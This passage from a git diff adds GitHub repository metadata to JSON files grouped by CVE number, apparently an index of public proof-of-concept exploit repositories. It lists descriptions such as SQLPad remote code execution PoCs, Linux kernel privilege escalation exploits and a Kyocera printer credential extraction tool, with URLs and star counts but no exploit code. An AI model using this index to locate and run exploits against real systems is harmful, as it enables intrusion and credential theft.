"watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 913058800, + "name": "CTF-CVE-2022-0847", + "full_name": "JustinYe377\/CTF-CVE-2022-0847", + "owner": { + "login": "JustinYe377", + "id": 97569874, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/97569874?v=4", + "html_url": "https:\/\/github.com\/JustinYe377", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/JustinYe377\/CTF-CVE-2022-0847", + "description": null, + "fork": false, + "created_at": "2025-01-07T00:25:12Z", + "updated_at": "2025-01-07T04:02:47Z", + "pushed_at": "2025-01-07T04:02:44Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 } ] \ No newline at end of file diff --git a/2022/CVE-2022-0848.json b/2022/CVE-2022-0848.json new file mode 100644 index 0000000000..0cd9c0b414 --- /dev/null +++ b/2022/CVE-2022-0848.json @@ -0,0 +1,64 @@ +[ + { + "id": 468650717, + "name": "CVE-2022-0848", + "full_name": "dskmehra\/CVE-2022-0848", + "owner": { + "login": "dskmehra", + "id": 18103236, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/18103236?v=4", + "html_url": "https:\/\/github.com\/dskmehra", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/dskmehra\/CVE-2022-0848", + "description": null, + "fork": false, + "created_at": "2022-03-11T07:26:04Z", + "updated_at": "2023-07-06T22:02:34Z", + "pushed_at": "2022-03-11T07:29:41Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 514188117, + "name": "CVE-2022-0848-RCE", + "full_name": "Lay0us\/CVE-2022-0848-RCE", + "owner": { + "login": "Lay0us", + "id": 99304369, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/99304369?v=4", + "html_url": "https:\/\/github.com\/Lay0us", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Lay0us\/CVE-2022-0848-RCE", + "description": null, + "fork": false, + "created_at": "2022-07-15T08:10:38Z", + "updated_at": "2023-07-06T22:02:41Z", + "pushed_at": "2022-07-15T06:29:58Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 0 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-0853.json b/2022/CVE-2022-0853.json new file mode 100644 index 0000000000..f29d338f82 --- /dev/null +++ b/2022/CVE-2022-0853.json @@ -0,0 +1,33 @@ +[ + { + "id": 468269355, + "name": "CVE-2022-0853", + "full_name": "ByteHackr\/CVE-2022-0853", + "owner": { + "login": "ByteHackr", + "id": 30409831, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/30409831?v=4", + "html_url": "https:\/\/github.com\/ByteHackr", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ByteHackr\/CVE-2022-0853", + "description": null, + "fork": false, + "created_at": "2022-03-10T09:10:56Z", + "updated_at": "2024-08-12T20:21:26Z", + "pushed_at": "2022-03-12T14:31:08Z", + "stargazers_count": 9, + "watchers_count": 9, + "has_discussions": false, + "forks_count": 6, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 6, + "watchers": 9, + "score": 0, + "subscribers_count": 3 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-0944.json b/2022/CVE-2022-0944.json new file mode 100644 index 0000000000..f93ad3a27d --- /dev/null +++ b/2022/CVE-2022-0944.json @@ -0,0 +1,252 @@ +[ + { + "id": 854311848, + "name": "CVE-2022-0944", + "full_name": "shhrew\/CVE-2022-0944", + "owner": { + "login": "shhrew", + "id": 179271961, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/179271961?v=4", + "html_url": "https:\/\/github.com\/shhrew", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/shhrew\/CVE-2022-0944", + "description": "A proof of concept exploit for SQLPad RCE (CVE-2022-0944).", + "fork": false, + "created_at": "2024-09-08T23:39:24Z", + "updated_at": "2024-10-26T18:00:04Z", + "pushed_at": "2024-09-08T23:57:27Z", + "stargazers_count": 7, + "watchers_count": 7, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 7, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 854473439, + "name": "CVE-2022-0944_RCE_Automation", + "full_name": "Philip-Otter\/CVE-2022-0944_RCE_Automation", + "owner": { + "login": "Philip-Otter", + "id": 78989650, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/78989650?v=4", + "html_url": "https:\/\/github.com\/Philip-Otter", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Philip-Otter\/CVE-2022-0944_RCE_Automation", + "description": "PoC code written for CVE-2022-0944 to make exploitation easier. Based on information found here: https:\/\/huntr.com\/bounties\/46630727-d923-4444-a421-537ecd63e7fb", + "fork": false, + "created_at": "2024-09-09T08:33:17Z", + "updated_at": "2024-09-10T17:01:28Z", + "pushed_at": "2024-09-10T17:01:25Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 854781649, + "name": "CVE-2022-0944", + "full_name": "FlojBoj\/CVE-2022-0944", + "owner": { + "login": "FlojBoj", + "id": 170850781, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/170850781?v=4", + "html_url": "https:\/\/github.com\/FlojBoj", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/FlojBoj\/CVE-2022-0944", + "description": "SQLPad - Template injection (POC exploit for SQLPad RCE [CVE-2022-0944])", + "fork": false, + "created_at": "2024-09-09T19:09:43Z", + "updated_at": "2024-12-09T18:18:45Z", + "pushed_at": "2024-09-10T14:23:01Z", + "stargazers_count": 5, + "watchers_count": 5, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 5, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 855111543, + "name": "sqlpad-rce-exploit-CVE-2022-0944", + "full_name": "0xRoqeeb\/sqlpad-rce-exploit-CVE-2022-0944", + "owner": { + "login": "0xRoqeeb", + "id": 49154037, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/49154037?v=4", + "html_url": "https:\/\/github.com\/0xRoqeeb", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/0xRoqeeb\/sqlpad-rce-exploit-CVE-2022-0944", + "description": null, + "fork": false, + "created_at": "2024-09-10T10:26:57Z", + "updated_at": "2025-01-04T18:22:26Z", + "pushed_at": "2024-09-10T16:18:40Z", + "stargazers_count": 9, + "watchers_count": 9, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 9, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 856828078, + "name": "CVE-2022-0944_RCE_POC", + "full_name": "Robocopsita\/CVE-2022-0944_RCE_POC", + "owner": { + "login": "Robocopsita", + "id": 181462171, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/181462171?v=4", + "html_url": "https:\/\/github.com\/Robocopsita", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Robocopsita\/CVE-2022-0944_RCE_POC", + "description": null, + "fork": false, + "created_at": "2024-09-13T09:30:08Z", + "updated_at": "2024-12-09T18:18:46Z", + "pushed_at": "2024-09-13T09:44:56Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 872147587, + "name": "CVE-2022-0944", + "full_name": "toneillcodes\/CVE-2022-0944", + "owner": { + "login": "toneillcodes", + "id": 148013535, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/148013535?v=4", + "html_url": "https:\/\/github.com\/toneillcodes", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/toneillcodes\/CVE-2022-0944", + "description": "PoC for RCE in SQLPad (CVE-2022-0944)", + "fork": false, + "created_at": "2024-10-13T22:34:09Z", + "updated_at": "2024-10-14T14:08:05Z", + "pushed_at": "2024-10-14T14:08:01Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cybersecurity" + ], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 878669450, + "name": "SQLPad-RCE-Exploit-CVE-2022-0944", + "full_name": "LipeOzyy\/SQLPad-RCE-Exploit-CVE-2022-0944", + "owner": { + "login": "LipeOzyy", + "id": 151560338, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/151560338?v=4", + "html_url": "https:\/\/github.com\/LipeOzyy", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/LipeOzyy\/SQLPad-RCE-Exploit-CVE-2022-0944", + "description": "CVE-2022-0944 Remote Code Execution Exploit", + "fork": false, + "created_at": "2024-10-25T20:31:09Z", + "updated_at": "2024-11-08T00:22:54Z", + "pushed_at": "2024-10-26T14:04:52Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 879408778, + "name": "SQLPad-6.10.0-Exploit-CVE-2022-0944", + "full_name": "0xDTC\/SQLPad-6.10.0-Exploit-CVE-2022-0944", + "owner": { + "login": "0xDTC", + "id": 95960398, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/95960398?v=4", + "html_url": "https:\/\/github.com\/0xDTC", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/0xDTC\/SQLPad-6.10.0-Exploit-CVE-2022-0944", + "description": "Refurbish", + "fork": false, + "created_at": "2024-10-27T20:26:47Z", + "updated_at": "2025-01-07T12:53:41Z", + "pushed_at": "2025-01-07T12:53:38Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-0952.json b/2022/CVE-2022-0952.json new file mode 100644 index 0000000000..5014969e73 --- /dev/null +++ b/2022/CVE-2022-0952.json @@ -0,0 +1,33 @@ +[ + { + "id": 675703857, + "name": "CVE-2022-0952", + "full_name": "RandomRobbieBF\/CVE-2022-0952", + "owner": { + "login": "RandomRobbieBF", + "id": 51722811, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/51722811?v=4", + "html_url": "https:\/\/github.com\/RandomRobbieBF", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/RandomRobbieBF\/CVE-2022-0952", + "description": "Sitemap by click5 < 1.0.36 - Unauthenticated Arbitrary Options Update", + "fork": false, + "created_at": "2023-08-07T14:28:11Z", + "updated_at": "2024-08-12T20:32:23Z", + "pushed_at": "2023-08-09T10:14:42Z", + "stargazers_count": 5, + "watchers_count": 5, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 5, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-0995.json b/2022/CVE-2022-0995.json new file mode 100644 index 0000000000..aae187b98b --- /dev/null +++ b/2022/CVE-2022-0995.json @@ -0,0 +1,95 @@ +[ + { + "id": 474473639, + "name": "CVE-2022-0995", + "full_name": "Bonfee\/CVE-2022-0995", + "owner": { + "login": "Bonfee", + "id": 53857102, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/53857102?v=4", + "html_url": "https:\/\/github.com\/Bonfee", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Bonfee\/CVE-2022-0995", + "description": "CVE-2022-0995 exploit", + "fork": false, + "created_at": "2022-03-26T21:46:09Z", + "updated_at": "2024-11-19T23:46:23Z", + "pushed_at": "2022-03-27T09:07:01Z", + "stargazers_count": 495, + "watchers_count": 495, + "has_discussions": false, + "forks_count": 70, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 70, + "watchers": 495, + "score": 0, + "subscribers_count": 8 + }, + { + "id": 612087603, + "name": "CVE-2022-0995", + "full_name": "AndreevSemen\/CVE-2022-0995", + "owner": { + "login": "AndreevSemen", + "id": 43631421, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/43631421?v=4", + "html_url": "https:\/\/github.com\/AndreevSemen", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/AndreevSemen\/CVE-2022-0995", + "description": "Реализация средств повышения привилегий в Linux", + "fork": false, + "created_at": "2023-03-10T07:05:45Z", + "updated_at": "2023-03-11T02:46:18Z", + "pushed_at": "2023-03-10T11:29:22Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 1, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 738494648, + "name": "CVE-2022-0995", + "full_name": "1nzag\/CVE-2022-0995", + "owner": { + "login": "1nzag", + "id": 29899371, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/29899371?v=4", + "html_url": "https:\/\/github.com\/1nzag", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/1nzag\/CVE-2022-0995", + "description": "CVE-2022-0995 exploit", + "fork": false, + "created_at": "2024-01-03T11:03:45Z", + "updated_at": "2024-01-03T11:20:25Z", + "pushed_at": "2024-01-03T11:12:38Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-1011.json b/2022/CVE-2022-1011.json new file mode 100644 index 0000000000..dfb40b0be8 --- /dev/null +++ b/2022/CVE-2022-1011.json @@ -0,0 +1,33 @@ +[ + { + "id": 654390552, + "name": "CVE-2022-1011", + "full_name": "xkaneiki\/CVE-2022-1011", + "owner": { + "login": "xkaneiki", + "id": 26479696, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/26479696?v=4", + "html_url": "https:\/\/github.com\/xkaneiki", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/xkaneiki\/CVE-2022-1011", + "description": "这个漏洞感觉只能信息泄露?", + "fork": false, + "created_at": "2023-06-16T03:02:38Z", + "updated_at": "2024-02-21T03:54:26Z", + "pushed_at": "2023-06-16T04:13:42Z", + "stargazers_count": 8, + "watchers_count": 8, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 8, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-1012.json b/2022/CVE-2022-1012.json new file mode 100644 index 0000000000..ce1254749e --- /dev/null +++ b/2022/CVE-2022-1012.json @@ -0,0 +1,33 @@ +[ + { + "id": 564211865, + "name": "Linux-4.19.72_CVE-2022-1012", + "full_name": "nanopathi\/Linux-4.19.72_CVE-2022-1012", + "owner": { + "login": "nanopathi", + "id": 26024136, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/26024136?v=4", + "html_url": "https:\/\/github.com\/nanopathi", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/nanopathi\/Linux-4.19.72_CVE-2022-1012", + "description": null, + "fork": false, + "created_at": "2022-11-10T08:30:12Z", + "updated_at": "2022-11-10T08:30:12Z", + "pushed_at": "2022-11-10T08:30:13Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-1015.json b/2022/CVE-2022-1015.json index df690e3a8e..c25244e79f 100644 --- a/2022/CVE-2022-1015.json +++ b/2022/CVE-2022-1015.json @@ -1,4 +1,35 @@ [ + { + "id": 476936527, + "name": "CVE-2022-1015", + "full_name": "pqlx\/CVE-2022-1015", + "owner": { + "login": "pqlx", + "id": 39501965, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/39501965?v=4", + "html_url": "https:\/\/github.com\/pqlx", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/pqlx\/CVE-2022-1015", + "description": "Local privilege escalation PoC for Linux kernel CVE-2022-1015", + "fork": false, + "created_at": "2022-04-02T03:27:11Z", + "updated_at": "2024-12-23T23:38:25Z", + "pushed_at": "2022-04-03T01:36:45Z", + "stargazers_count": 202, + "watchers_count": 202, + "has_discussions": false, + "forks_count": 32, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 32, + "watchers": 202, + "score": 0, + "subscribers_count": 7 + }, { "id": 477188610, "name": "CVE-2022-1015-1016", @@ -29,5 +60,253 @@ "watchers": 0, "score": 0, "subscribers_count": 1 + }, + { + "id": 526318455, + "name": "bob_kern_exp1", + "full_name": "shuttterman\/bob_kern_exp1", + "owner": { + "login": "shuttterman", + "id": 59496260, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/59496260?v=4", + "html_url": "https:\/\/github.com\/shuttterman", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/shuttterman\/bob_kern_exp1", + "description": "CVE-2022-1015", + "fork": false, + "created_at": "2022-08-18T17:54:49Z", + "updated_at": "2022-08-07T06:18:16Z", + "pushed_at": "2022-08-06T12:40:37Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 0 + }, + { + "id": 556222673, + "name": "CVE-2022-1015", + "full_name": "ysanatomic\/CVE-2022-1015", + "owner": { + "login": "ysanatomic", + "id": 41269324, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/41269324?v=4", + "html_url": "https:\/\/github.com\/ysanatomic", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ysanatomic\/CVE-2022-1015", + "description": "A write-up and LPE PoC of an OOB read and write vulnerability in the Linux Kernel.", + "fork": false, + "created_at": "2022-10-23T10:57:43Z", + "updated_at": "2024-03-29T09:10:30Z", + "pushed_at": "2022-11-12T06:58:35Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 3, + "score": 0, + "subscribers_count": 3 + }, + { + "id": 600659828, + "name": "CVE-2022-1015", + "full_name": "wlswotmd\/CVE-2022-1015", + "owner": { + "login": "wlswotmd", + "id": 80761172, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/80761172?v=4", + "html_url": "https:\/\/github.com\/wlswotmd", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/wlswotmd\/CVE-2022-1015", + "description": null, + "fork": false, + "created_at": "2023-02-12T07:06:40Z", + "updated_at": "2023-02-12T07:09:56Z", + "pushed_at": "2023-04-26T09:40:17Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 610271922, + "name": "CVE-2022-1015", + "full_name": "delsploit\/CVE-2022-1015", + "owner": { + "login": "delsploit", + "id": 127108998, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/127108998?v=4", + "html_url": "https:\/\/github.com\/delsploit", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/delsploit\/CVE-2022-1015", + "description": null, + "fork": false, + "created_at": "2023-03-06T12:50:43Z", + "updated_at": "2023-03-06T12:51:55Z", + "pushed_at": "2023-03-06T12:51:50Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 617380197, + "name": "CVE-2022-1015", + "full_name": "pivik271\/CVE-2022-1015", + "owner": { + "login": "pivik271", + "id": 82135340, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/82135340?v=4", + "html_url": "https:\/\/github.com\/pivik271", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/pivik271\/CVE-2022-1015", + "description": null, + "fork": false, + "created_at": "2023-03-22T09:16:58Z", + "updated_at": "2023-04-25T01:05:15Z", + "pushed_at": "2023-03-22T09:20:24Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 675264070, + "name": "CVE-2022-1015", + "full_name": "more-kohii\/CVE-2022-1015", + "owner": { + "login": "more-kohii", + "id": 87258637, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/87258637?v=4", + "html_url": "https:\/\/github.com\/more-kohii", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/more-kohii\/CVE-2022-1015", + "description": "Linux Kernel 1-Day Analysis & Exploitation", + "fork": false, + "created_at": "2023-08-06T10:46:49Z", + "updated_at": "2024-07-02T09:40:21Z", + "pushed_at": "2023-08-08T00:42:57Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 698913839, + "name": "CVE-2022-1015", + "full_name": "0range1337\/CVE-2022-1015", + "owner": { + "login": "0range1337", + "id": 146405672, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/146405672?v=4", + "html_url": "https:\/\/github.com\/0range1337", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/0range1337\/CVE-2022-1015", + "description": null, + "fork": false, + "created_at": "2023-10-01T11:18:48Z", + "updated_at": "2023-10-01T11:18:48Z", + "pushed_at": "2024-03-18T12:45:37Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 872919160, + "name": "CVE-2022-1015", + "full_name": "seadragnol\/CVE-2022-1015", + "owner": { + "login": "seadragnol", + "id": 55611051, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/55611051?v=4", + "html_url": "https:\/\/github.com\/seadragnol", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/seadragnol\/CVE-2022-1015", + "description": null, + "fork": false, + "created_at": "2024-10-15T09:51:06Z", + "updated_at": "2024-10-15T10:09:11Z", + "pushed_at": "2024-10-15T10:09:07Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 } ] \ No newline at end of file diff --git a/2022/CVE-2022-1026.json b/2022/CVE-2022-1026.json new file mode 100644 index 0000000000..9668b9c9a7 --- /dev/null +++ b/2022/CVE-2022-1026.json @@ -0,0 +1,95 @@ +[ + { + "id": 614407734, + "name": "kyocera-cve-2022-1026", + "full_name": "ac3lives\/kyocera-cve-2022-1026", + "owner": { + "login": "ac3lives", + "id": 26721330, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/26721330?v=4", + "html_url": "https:\/\/github.com\/ac3lives", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ac3lives\/kyocera-cve-2022-1026", + "description": "An unauthenticated data extraction vulnerability in Kyocera printers, which allows for recovery of cleartext address book and domain joined passwords", + "fork": false, + "created_at": "2023-03-15T14:23:41Z", + "updated_at": "2024-12-14T13:37:59Z", + "pushed_at": "2023-03-15T14:33:48Z", + "stargazers_count": 8, + "watchers_count": 8, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 8, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 666781357, + "name": "nmap-printer-nse-scripts", + "full_name": "flamebarke\/nmap-printer-nse-scripts", + "owner": { + "login": "flamebarke", + "id": 39644720, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/39644720?v=4", + "html_url": "https:\/\/github.com\/flamebarke", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/flamebarke\/nmap-printer-nse-scripts", + "description": "NSE port of CVE-2022-1026 exploit for mass identification and exploitation", + "fork": false, + "created_at": "2023-07-15T14:56:55Z", + "updated_at": "2024-04-11T01:51:49Z", + "pushed_at": "2023-07-15T14:59:06Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 814582796, + "name": "kygocera", + "full_name": "r0lh\/kygocera", + "owner": { + "login": "r0lh", + "id": 51697374, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/51697374?v=4", + "html_url": "https:\/\/github.com\/r0lh", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/r0lh\/kygocera", + "description": "Improved Golang Version of Rapid7 PoC for CVE-2022-1026", + "fork": false, + "created_at": "2024-06-13T09:40:02Z", + "updated_at": "2024-06-13T12:18:39Z", + "pushed_at": "2024-06-13T12:18:36Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-10270.json b/2022/CVE-2022-10270.json new file mode 100644 index 0000000000..97bd1f8d6f --- /dev/null +++ b/2022/CVE-2022-10270.json @@ -0,0 +1,33 @@ +[ + { + "id": 587225929, + "name": "sunflower_exp", + "full_name": "baimaobg\/sunflower_exp", + "owner": { + "login": "baimaobg", + "id": 110097762, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/110097762?v=4", + "html_url": "https:\/\/github.com\/baimaobg", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/baimaobg\/sunflower_exp", + "description": "Sunflower CVE-2022-10270 vulnerability exploitation tool", + "fork": false, + "created_at": "2023-01-10T08:56:15Z", + "updated_at": "2024-10-31T04:35:59Z", + "pushed_at": "2023-01-10T10:27:53Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 3, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-1040.json b/2022/CVE-2022-1040.json index 78ffd75f0a..1be4e7a3e9 100644 --- a/2022/CVE-2022-1040.json +++ b/2022/CVE-2022-1040.json @@ -29,5 +29,191 @@ "watchers": 16, "score": 0, "subscribers_count": 3 + }, + { + "id": 541212587, + "name": "Sophos-Vulnerability", + "full_name": "jam620\/Sophos-Vulnerability", + "owner": { + "login": "jam620", + "id": 17382838, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/17382838?v=4", + "html_url": "https:\/\/github.com\/jam620", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/jam620\/Sophos-Vulnerability", + "description": "CVE-2022-1040", + "fork": false, + "created_at": "2022-09-25T15:15:01Z", + "updated_at": "2024-06-21T00:10:24Z", + "pushed_at": "2022-09-25T15:15:44Z", + "stargazers_count": 15, + "watchers_count": 15, + "has_discussions": false, + "forks_count": 5, + "allow_forking": true, + 